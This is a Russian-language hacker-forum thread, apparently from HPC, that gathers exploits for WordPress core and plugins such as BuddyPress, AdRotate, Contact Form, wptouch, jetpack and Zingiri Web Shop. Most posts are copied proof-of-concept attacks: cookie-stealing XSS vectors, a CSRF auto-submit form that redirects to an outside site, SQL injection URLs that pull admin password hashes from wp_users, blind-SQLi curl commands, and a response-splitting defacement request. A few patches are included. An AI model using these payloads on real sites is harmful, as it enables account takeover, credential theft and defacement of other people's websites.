Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
  , 16:00   #1
Продвинутый
 
Аватар для M@ZAX@KEP
 
Локация: 404 - Not Found
Регистрация: 14.05.2009
Сообщений: 2,831

Репутация: 616 / 8

HPC Activity Medal 
По умолчанию Уязвимости WordPress

Уязвимости WordPress CMS

Правила темы:
  • Вопросы по уязвимостям - сюда. Здесь выкладываются только сами баги.
  • Обсуждения выложенных уязвимостей допускаются если есть замечания строго по теме.
  • Не допускаются просьбы найти вам, выложить или объяснить ту или иную уязвимость. В том числе вопросы, нет ли у кого-то уязвимости на такую-то ветку. Если в теме нет - значит ищем здесь.

Правила и пожелания к оформлению:
  • Указание автора эксплойта и\или первоисточника, обнаружившего уязвимость. Другие копипастеры для указания в качестве источников не допускаются.
  • Обязательно указывайте версии уязвимых продуктов и есть ли у уязвимости иные зависимости (напр., директивы конфигурации веб-сервера или уязвимые версии браузеров в случае нестандартной xss)
  • Не нужно выкладывать голословные "новости" об уязвимостях, не имеющих ни эксплойта, ни PoC.
  • Крайне желательно описывать способ исправления уязвимости или давать ссылку на патч.

Нарушителей правил темы буду гонять минусами в репутацию. И банами, если уже ставил минус в последние 10 дней. Горчичниками не отделаетесь.
Пользователи, проявляющие активность в теме и выкладывающие свежие баги, будут поощряться плюсами в репутацию. Пользователи, выкладывающие собственноручно найденные уязвимости, получают хорошие шансы попасть под программу повышения корректности репутации и в приватные группы клуба.
__________________
wut...?
Пользователь вне форума    
Наши Спонсоры
  , 16:14   #2
Продвинутый
 
Аватар для M@ZAX@KEP
 
Локация: 404 - Not Found
Регистрация: 14.05.2009
Сообщений: 2,831

Репутация: 616 / 8

HPC Activity Medal 
По умолчанию

Открою тему уязвимостями, опубликованными ранее в разделе Bugtraq сайта другими пользователями. Ники опубликовавших и полное описание уязвимостей см. по ссылкам.

Отображаемая XSS в WordPress Google Analytics Plugin
Уязвимы версии: 3.* (версия плагина, а не движка)

Отображаемая XSS и обход ограничений безопасности в WordPress Simple:Press Plugin
Уязвимы версии: 4.* (версия плагина, а не движка)

Отображаемая XSS в WordPress
Уязвимы версии: 2.*

Обход ограничений безопасности в Wordpress
Уязвимы версии: 2.*, 3.*
__________________
wut...?
Пользователь вне форума    
  , 16:32   #3
Продвинутый
 
Аватар для M@ZAX@KEP
 
Локация: 404 - Not Found
Регистрация: 14.05.2009
Сообщений: 2,831

Репутация: 616 / 8

HPC Activity Medal 
По умолчанию Множественные уязвимости Wordpress 3.3.1

1) Хранимая (активная) XSS
Уязвимость присутствует в фильтре html кодов для комментариев. Атакующий может оставить комментарий с ссылкой, выполняющий javascript:
source:
<a href="feed:javascript:alert(1)">CLICK ME</a>
2) CSRF в функции 'оставить комментарий'
Атакующий может составить CSRF POST запрос на добавление комментария. Тут без комментариев. PoC под пунктом 3.

3) Отражаемая (пассивная) XSS в POST запросе
При отправке POST запроса на добавление комментария можно отправить дополнительный параметр: redirect_to, который позволяет перенаправить пользователя на произвольный адрес после размещения комментария. PoC эксплойт составлен с учётом наличия CSRF, описанной в п.2:
source:
<body onload="document.forms[0].submit()"> 
<form action="http://127.0.0.1/wordpress/wp-comments-post.php" method=POST> 
<input type="hidden" name="comment" value="Join the right side" />
<input type="hidden" name="redirect_to" 
value="http://hacker-pro.net/" /> 
<input type="hidden" value="1" name="comment_post_ID"> 
<input type="hidden" value="0" name="comment_parent"> 
</form> 
</body>
4) Хранимая (активная) XSS
Присутствует из-за бага в функции make_clickable(). Атакующий может оставить ссылку в комментарии, вызывающую javascript код при наведении. Для атаки можно использовать 2 вектора:
source:
<a href="http:irc://onmouseover=alert(1)//">qweqwe</a>
source:
<a href="mailto:ftp://onclick=alert(1)//">qweqwe</a>
Движок преобразует данные векторы таким образом:
source:
<a rel="nofollow" onmouseover="alert(1)//"" irc:="" href="http:<a href=">irc://onmouseover=alert(1)//</a>
Патч: обновитесь до последней версии Wordpress (3.3.2 на данный момент).

Автор, источник: Mauro Gentile aka sneak
__________________
wut...?
Пользователь вне форума    
  , 18:32   #4
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию Уязвимости WordPress

Доступ к файловой системе в WordPress 2.x

Цитата:
Найденная уязвимость позволяет перезаписать произвольные файлы на целевой системе. Уязвимость существует из-за того, что xmlrpc.php не правильно ограничивает доступ к функциональности редактирования. Атакующий может редактировать сообщения других пользователей.
--------------------------------------------------------------------------------------------------------------------------------
Цитата:
SQL-инъекция и доступ к конфиденциальной информации в WordPress 2.x
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и получить доступ к конфиденциальной информации. Уязвимость существует из-за недостаточной обработки входных данных в параметре "s" сценарием index.php (когда "exact" и "sentence" установлены в значение "1"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Успешное эксплуатирование уязвимости позволит получить хэши пароля администратора, но требует знание префикса таблицы базы данных и чтобы "DB_CHARSET" в wp-config.php был установлен в значения "GBK" или "Big5".
Пример:
source:
http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-  1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,  14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
------------------------------------------------------------------------------------------------------------------------------
HTTP Response Splitting в WordPress 1.2


Удаленный атакующий может подменить содержание уязвимой страницы и выполнить произвольный сценарий в браузере жертвы.

Эксплоит:

code:
POST /wp-login.php HTTP/1.0
Host: HOSTNAME
Content-Type: application/x-www-form-urlencoded
Content-length: 226 

action=login&mode=profile&log=USER&pwd=PASS&text= %0d%0aConnection:%20Keep-Alive%0d%0aContent-Length: %200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0a Content-Length:%2021%0d%0aContent-Type:%20text/html %0d%0a%0d%0a<html>*defaced*</html>
 
Пользователь вне форума    
  , 18:34   #5
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию

Цитата:
Межсайтовый скриптинг в WordPress


Удаленный пользователь может выполнить XSS нападение.

Пример:

source:
wp-login.php?redirect_to=[XSS]
 
Пользователь вне форума    
  , 18:36   #6
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию

Цитата:
Отказ в обслуживании в WordPress 2.x


Цитата:
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за того, что WordPress не проверяет pingback URL или не ограничивает максимальный размер файлов загружаемых во время процесса pingback.
Атакующий может передать большое количество pingback данных, содержащих URL к большим файлам, что приведет к отказу системы в обслуживании.
Пример:
http://trac.wordpress.org/attachment...137/exploit.py
 
Пользователь вне форума    
  , 18:40   #7
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию

source:
# Exploit Title: Buddypress plugin of Wordpress remote SQL Injection# Date: March 31, 2012
# Author: Ivan Terkin
# Exploitation: Remote Exploit
# Bug: Remote SQL Injection
# Software Link: buddypress.org
# Version: till 1.5.5
# Tested on: Buddypress 1.5.4
 
 
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: [url]http://example.com/activity/?s=b[/url]
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
 
action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
 
Reported to developers and fixed in version 1.5.5
www.exploit-db.com
 
Пользователь вне форума    
  , 18:42   #8
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию

source:
# Exploit Title: Wordpress uCan Post plugin <= 1.0.09 Stored XSS# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18 
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi [url]http://brindi.si/g/[/url])
# Software Link: [url]http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip[/url]
# Version: 1.0.09
 
1)  You need permissions to publish a post from the public interface:
 
    The submission form is not well sanitized and will result in stored xss
    in admin pages:
 
    * Name field is not sanitized and it's injectable with a payload 
      which will be stored in the pending submission page in admin panel
      POC: myname'"><script>window.alert(document.cookie)</script>
 
    * Email field is not sanitized but can it will check for a valid email address
      so the maximum result will be a reflected xss
      POC: [email][email protected]'"><script>window.alert(document.cook[/email]ie)</script>
 
    * Post Title is not sanitized and it's injectable with a payload
      which will be stored in the pending submissions page in admin panel
      POC: title'"><script>window.alert(document.cookie)</script>
www.exploit-db.com
 
Пользователь вне форума    
  , 18:48   #9
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию

code:
# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability# Date: 2011-10-13
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
# Version: 2.7.5 (tested)
 
---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php 
wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1  AND  1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
  
e.g.
curl  --data  "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1  AND  1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)"  -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1
  
---------------
Vulnerable code
---------------
Line 49:
    public function the_content($content) {
        global $wpdb;
        global $table_name;
        global $settings_table_name;
 
        $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
 
        if ($_POST['wpcf_easyform_submitted'] == 1) {
 
            $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
 
---------------
Patch
---------------
 
*** ./easy-form.class.php.orig  2011-10-13 19:53:05.674800956 -0400
--- ./easy-form.class.php   2011-10-13 19:51:21.442799615 -0400
***************
*** 54,61 ****
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
           
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!         
!             $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
               
              $continue = true;
               
--- 54,63 ----
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
           
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!               $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
!             $wpcf_easyform_formid=substr($wpcf_easyform_formid,2); 
!             
!   $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
               
              $continue = true;
               
***************
*** 71,80 ****
              if ($continue) {
               
                  //loop through the fields of this form (read from DB) and build the message here
!                 $form_fields = $wpdb->get_results("
                    SELECT *
                    FROM $settings_table_name
!                   WHERE form_id = ".$_POST['wpcf_easyform_formid']."
                    ORDER BY position
                ");
                 
--- 73,82 ----
              if ($continue) {
               
                  //loop through the fields of this form (read from DB) and build the message here
!       $form_fields = $wpdb->get_results("
                    SELECT *
                    FROM $settings_table_name
!                   WHERE form_id = ".$wpcf_easyform_formid."
                    ORDER BY position
                ");
www.exploit-db.com
 
Пользователь вне форума    
  , 18:50   #10
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию

source:
# Exploit Title: WordPress wptouch plugin SQL Injection Vulnerability# Date: 2011-27-10
# Author: longrifle0x
# software: Wordpress
# Tools: SQLMAP
---------------
(POST data)
---------------
 
[url]http://www.site.com/wp-content/plugins/wptouch/ajax.php[/url]
 
#Exploit: id=-1; id=- AND SLEEP(5) or 1=if
 
[url]http://site.com/wp-content/plugins/wptouch/ajax.php][/url][GET][id=-1][CURRENT_USER()
 
[url]http://site.com/wp-content/plugins/wptouch/ajax.php][/url][GET][id=-1][SELECT
(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)
 
[url]http://site.com/wp-content/plugins/wptouch/ajax.php][/url][GET][id=-1][MID((VERSION()),1,6)
www.exploit-db.com
 
Пользователь вне форума    
  , 18:53   #11
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию

source:
####################################################### Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability
# Date: 2011-30-10
# Author: longrifle0x
# software: Wordpress
# Download: [url]http://wordpress.org/extend/plugins/wp-glossary/[/url]
# Tools: SQLMAP
######################################################
 
*DESCRIPTIONDiscovered a vulnerability in WP Glossary, Wordpress Plugin,
vulnerability is SQL injection.
File: wp-content/plugins/wp-glossary/ajax.php
Exploit: id=-1; or 1=if
 
*Exploitation*
[url]http://localhost:80/wp-content/plugins/wp-glossary/ajax.php[/url]
 [GET][id=-1][CURRENT_USER()
[url]http://localhost:80/wp-content/plugins/wp-glossary/ajax.php[/url]
 [GET][id=-1][SELECT
(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)
[url]http://localhost:80/[/url]
wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][MID((VERSION()),1,6)
 
 
***Greetz: Georgian Underground Community***
www.exploit-db.com
 
Пользователь вне форума    
  , 18:54   #12
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию

source:
# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability# Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: [url]http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip[/url]
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded
 
---
PoC
---
[url]http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj[/url]
 
e.g.
#!/bin/bash
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded
 
---------------
Vulnerable code
---------------
 
if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl  = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM  `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;")); //wrong  (mis)usage of wpdb->prepare()
www.exploit-db.com
 
Пользователь вне форума    
  , 18:55   #13
Местный
 
Аватар для whitehack
 
Регистрация: 21.03.2012
Сообщений: 166

Репутация: 13 / 1
По умолчанию

code:
####################################################### Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
######################################################
 
*DESCRIPTION
Discovered a vulnerability in  jetpack, Wordpress Plugin,
vulnerability is SQL injection.
 
File:wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
 
*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][MID((VERSION()),1,6)
www.exploit-db.com
 
Пользователь вне форума    
  , 22:01   #14
Продвинутый
 
Аватар для M@ZAX@KEP
 
Локация: 404 - Not Found
Регистрация: 14.05.2009
Сообщений: 2,831

Репутация: 616 / 8

HPC Activity Medal 
По умолчанию Wordpress Zingiri Web Shop Plugin <= 2.4.0 - множественные xss уязвимости

Множественные XSS уязвимости в плагине Zingiri Web Shop Plugin <= 2.4.0 для Wordpress
Проверено в версиях 2.3.0 и 2.4.0

1) Отображаемая (пассивная) xss
source:
http://localhost/wordpress/?page="><script>alert(document.cookie)</script>
Авторизация не обязательна.

2) Хранимая (активная) xss
Вектор попадает в базу данных, после чего отображается в админке в списке заказанных товаров. Таким образом, не нужно никакой соц инженерии.
  1. Авторизуемся
  2. Идём в меню магазина
  3. Выбираем товар
  4. Жмём "заказать" (order)
  5. Жмём "оплатить" (checkout)
  6. Ядовитый javascript грузим в секцию комментариев\вопросов
  7. Жмём "оплатить" (checkout)
  8. Ждём наступления профита
__________________
wut...?
Пользователь вне форума    
 

 

Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.